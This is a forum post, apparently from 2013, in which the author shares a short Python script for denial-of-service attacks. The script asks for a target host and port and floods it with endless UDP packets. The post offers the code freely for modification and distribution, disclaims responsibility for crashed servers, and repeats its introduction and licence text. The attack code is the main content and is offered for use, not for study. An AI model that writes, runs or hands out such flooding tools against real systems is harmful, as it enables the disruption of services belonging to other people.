Heres a little program for preforming dos attacks on computers/servers that I wrote I don't even know if it will actually work well.
1. I am not responsible for if it actually crashes a server or something.
2. Do whatever you want with it you can modify it, distribute it whatever as long as you don't take credit for it (unless if its modified you can take some of the credit not all).
Source:
USE AT YOUR OWN RISK
1. I am not responsible for if it actually crashes a server or something.
2. Do whatever you want with it you can modify it, distribute it whatever as long as you don't take credit for it (unless if its modified you can take some of the credit not all).
Source:
- Code:
import socket
host = input("Enter host to be dosed:")
port = int(input("Please enter on witch port:"))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((host, port))
input("Press enter when ready")
print("Dossing...")
text = bytes("SPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAM", 'utf-8')
while True:
sock.send(text)
print("Dosing stoped")
USE AT YOUR OWN RISK
Last edited by deathx on 12/6/2013, 4:02 pm; edited 3 times in total (Reason for editing : Fixed the code and made it better)